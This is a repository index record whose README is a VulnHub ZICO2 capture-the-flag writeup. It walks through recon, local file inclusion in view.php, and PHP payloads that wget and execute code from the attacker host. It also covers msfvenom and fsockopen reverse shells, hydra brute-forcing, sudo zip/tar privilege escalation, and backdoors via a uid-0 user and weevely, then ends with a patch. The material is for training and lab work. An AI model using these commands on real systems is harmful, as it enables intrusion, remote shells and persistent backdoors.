{"id":20424601,"url":"https://github.com/madfxr/zico2-writeup","last_synced_at":"2026-02-04T09:03:48.161Z","repository":{"id":114164070,"uuid":"167530492","full_name":"madfxr/zico2-writeup","owner":"madfxr","description":"ZICO2: 1 Writeup - Web Application Security","archived":false,"fork":false,"pushed_at":"2025-07-07T16:30:57.000Z","size":39,"stargazers_count":3,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-07-18T20:12:21.902Z","etag":null,"topics":["ctf","cybersecurity","hacking","offensive-security","penetration-testing","redteam","vulnhub","writeup"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/madfxr.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2019-01-25T10:33:29.000Z","updated_at":"2025-07-07T16:31:01.000Z","dependencies_parsed_at":null,"dependency_job_id":"e56f1402-759c-4c7b-9032-95439ca8332b","html_url":"https://github.com/madfxr/zico2-writeup","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/madfxr/zico2-writeup","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madfxr%2Fzico2-writeup","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madfxr%2Fzico2-writeup/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madfxr%2Fzico2-writeup/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madfxr%2Fzico2-writeup/manifests",
"owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/madfxr","download_url":"https://codeload.github.com/madfxr/zico2-writeup/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madfxr%2Fzico2-writeup/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29079400,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-04T03:31:03.593Z","status":"ssl_error","status_checked_at":"2026-02-04T03:29:50.742Z","response_time":62,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ctf","cybersecurity","hacking","offensive-security","penetration-testing","redteam","vulnhub","writeup"],"created_at":"2024-11-15T07:10:12.555Z","updated_at":"2026-02-04T09:03:48.122Z","avatar_url":"https://github.com/madfxr.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# ZICO2: 1 Writeup - Web Application Security\nA method of learning how to find vulnerabilities in a system. 
A simulation of ethical hacking: how we, as pentesters, can enter a system by exploiting vulnerabilities that exist on the victim's website, and how to secure it by patching those vulnerabilities.\n\n## Tools\n- [Dirsearch.](https://www.kali.org/tools/dirsearch)\n- [Uniscan.](https://www.kali.org/tools/uniscan/#uniscan)\n- [SearchSploit.](https://www.kali.org/tools/exploitdb/#searchsploit)\n- [Netcat.](https://www.kali.org/tools/netcat/#nctraditional)\n- [Metasploit Framework.](https://www.kali.org/tools/metasploit-framework/#metasploit-framework)\n- [Weevely.](https://www.kali.org/tools/weevely/#weevely)\n\n## Templates\n[ZICO2: 1.](https://www.vulnhub.com/entry/zico2-1,210/)\n\n## Methodology \u0026 Technique\n### Reconnaissance\n#### Network Mapping\n```\nnmap -A -v -T5 -sS 192.168.1.1\n\n-A = Enables OS detection and Version detection, Script scanning and Traceroute\n-v = Increase verbosity level (use twice or more for greater effect)\n-T5 = Set timing template (higher is faster)\n-sS = TCP SYN scan\n```\n\n#### Information Gathering/Footprinting\n```\nping 192.168.1.1\ntelnet 192.168.1.1 80\ntelnet 192.168.1.1 22\nnc 192.168.1.1 80\nnc 192.168.1.1 22\ncurl -I 192.168.1.1\n\n-I = Fetch the headers only!\n```\n\n### Reporting\n#### Creating Reconnaissance Report\n```\nnmap -A -v -T5 -sS 192.168.1.1 -oN 192.168.1.1-top10TCP.nmap\n\n--top-ports 10 = Scan 10 most common ports\n--open = Only show open (or possibly open) ports\n-Pn = Disable host discovery\n-n = Never do DNS resolution\n-oN = Output scan in normal format\n```\n\n### Scanning\n#### Web Object Scanning\n```\ndirsearch -u http://192.168.1.1 -w /usr/share/dirb/wordlists/common.txt -e php\n\n-u = URL\n-w = Wordlists\n-e = Extensions\n```\n\n#### Web Vulnerabilities Scanning\n```\nuniscan -u 192.168.1.1 -qweds\n\n-u = URL\n-q = Enable Directory checks\n-w = Enable File checks\n-e = Enable robots.txt and sitemap.xml check\n-d = Enable Dynamic checks\n-s = Enable Static 
checks\n```\n\n### Exploitation\n#### Searching Exploit\n```\nsearchsploit phpliteadmin\ncat /opt/searchsploit/exploits/php/webapps/24044.txt\n```\n\n#### Google Dorking\n```\ninurl: phpliteadmin default password\n```\n\n#### Creating Meterpreter Shell\n```\nmsfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf -o shell\nmv shell /usr/share/nginx/html/\nchmod 777 shell\nvim /usr/databases/meterpreter_reverse_tcp_shell.php\n```\n```\n\u003c?php system(\"cd /tmp; wget http://192.168.1.2/shell; chmod 777 shell; ./shell\"); ?\u003e\n```\n\n#### Creating Meterpreter Exploit\n```\nservice postgresql start\nmsfconsole\n```\n```\nuse exploit/multi/handler\nset PAYLOAD linux/x64/meterpreter/reverse_tcp\nset LHOST 192.168.1.2\nset LPORT 443\nexploit\n```\n\n#### Accessing Meterpreter Shell\n```\nhttp://192.168.1.1/view.php?page=../../usr/databases/meterpreter_reverse_tcp_shell.php\n```\n\n#### Accessing Pseudo-Terminal\n```\nshell\n```\n```\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n-c = Command\npty = Pseudo-terminal utilities\npty.spawn = Function that spawns a process attached to a pseudo-terminal\n```\n\n#### Creating Reverse Shell\n```\ncd /usr/share/nginx/html\nvim shell.txt\n```\n```\n\u003c?php $sock=fsockopen(\"192.168.1.2\",1234); exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\"); ?\u003e\n```\n```\nchmod 777 shell.txt\nvim /usr/databases/php_system_reverse_shell.php\n```\n```\n\u003c?php system(\"wget http://192.168.1.2/shell.txt -O /tmp/shell.php; php /tmp/shell.php\"); ?\u003e\n```\n\n#### Accessing Reverse Shell\n```\nnc -lvp 1234 / netcat -lvp 1234\n\n-l = Listen mode\n-v = Prints status messages\n-p = Listening port\n```\n```\nhttp://192.168.1.1/view.php?page=../../usr/databases/php_system_reverse_shell.php\n```\n```\nbash -i\n\n-i = Shell is interactive\n```\n\n### Gaining Access\n```\nhydra -l root -P /opt/rockyou.txt ssh://192.168.1.1:22\n\n-l = Username\n-P = Password list\nssh = Protocol\n22 = Default 
port service\n```\n```\ncd /home/zico/wordpress\ncat wp-config.php | grep DB_\n```\n```\ndefine('DB_NAME', 'zico');\ndefine('DB_USER', 'zico');\ndefine('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');\ndefine('DB_HOST', 'zico');\ndefine('DB_CHARSET', 'utf8');\ndefine('DB_COLLATE', '');\n```\n```\nssh zico@192.168.1.1\n```\n\n### Privilege Escalation\n```\nsudo -l\ntouch /tmp/privesc\nsudo -u root zip /tmp/privesc.zip /tmp/privesc -T --unzip-command=\"sh -c /bin/bash\"\nsudo -u root tar cf /dev/null /tmp/privesc --checkpoint=1 --checkpoint-action=exec=/bin/bash\nsudo -u root zip /tmp/privesc.zip /tmp/privesc -T --unzip-command=\"python -c 'import pty; pty.spawn(\\\"/bin/sh\\\")'\"\n\n-l = List\n-u = User\n-T = Test the integrity of the new zip file\n-i = Shell is interactive\n```\n```\nbash -i\nwhoami\nid root\n```\n\n### Backdooring\n#### Creating Backdoored User Login\n```\nuseradd -ou 0 -g 0 zombie\npasswd zombie\nid zombie\n\n-o = --non-unique (Duplicate User)\n-u = --uid (User ID) -\u003e 0 (Root User) / 1000 (Sudo User)\n-g = --gid (Group ID)\n```\n\n#### Creating PHP Backdoored\n```\nweevely generate b@cKd00r3d /usr/share/nginx/html/backdoored\nchmod 777 /usr/share/nginx/html/backdoored\nvim /usr/databases/post_exploitation_backdoored.php\n```\n```\n\u003c?php system(\"cd /tmp; wget http://192.168.1.2/backdoored; chmod 777 backdoored; mv backdoored backdoored.php\"); ?\u003e\n```\n\n#### Accessing PHP Backdoored\n```\nhttp://192.168.1.1/view.php?page=../../usr/databases/post_exploitation_backdoored.php\n```\n```\nweevely http://192.168.1.1/view.php?page=../../tmp/backdoored.php b@cKd00r3d\n```\n\n### Vulnerability Patching\n#### Vulnerable Code\n```\ncd /var/www/dbadmin\ncat view.php\n```\n```\n\u003c?php\n       // Vulnerable: the user-controlled 'page' parameter is concatenated into include(), so '../' sequences reach files outside /var/www/\n       $page = $_GET['page'];\n       include(\"/var/www/\".$page);\n?\u003e\n```\n\n#### Patch Code\n```\nvim view.php-patch\n```\n```\n\u003c?php\n       // FILTER_SANITIZE_ENCODED URL-encodes the value ('/' becomes '%2F'), so '../' sequences no longer traverse out of /var/www/\n       $page = filter_input(INPUT_GET, 'page', FILTER_SANITIZE_ENCODED);\n       
include(\"/var/www/\".$page);\n?\u003e\n```\n\n## Notes\n- This simulation is only intended for learning.\n- All actions that refer to criminal acts are beyond the responsibility of the author.\n- Happy hacking.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmadfxr%2Fzico2-writeup","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmadfxr%2Fzico2-writeup","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmadfxr%2Fzico2-writeup/lists"}